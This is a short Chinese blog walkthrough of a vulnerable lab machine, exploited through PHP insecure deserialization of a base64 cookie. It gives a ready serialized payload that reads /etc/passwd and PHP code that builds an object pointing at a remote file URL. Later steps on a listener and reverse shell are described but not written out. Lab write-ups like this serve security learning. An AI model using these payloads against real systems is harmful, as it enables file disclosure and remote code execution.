1.安装靶场进行配置
2.打开kali扫描IP
nmap -PS -T4 192.168.245.0/24
3.物理机访问靶场
4.F12查看网络,刷新一下得到一串base64编码
5.进行base64解码,乱码为空格改为\x00,再次进行base64加密,得到payload如下
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=
6.打开抓包替换为修改后的payload
7.将这一段复制到目录下,在浏览器中打开得到base64编码
<?php
class Log {
private $type_log = "http://xxx.xxx.xxx.xxx/xxx.txt";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
echo base64_encode(serialize($obj));
8.返回burp抓包,修改base64编码为我们刚刚得到的编码
9.打开kali进行监听
10.使用命令让目标连接本地端口
11.可以发现监听成功
12.访问根目录发现敏感文件
13.得到用户名密码
14.反弹shell脚本并发送请求
标签:编码,序列化,kali,base64,payload,new,serial,打开,靶机 From: https://blog.csdn.net/weixin_53198216/article/details/140853009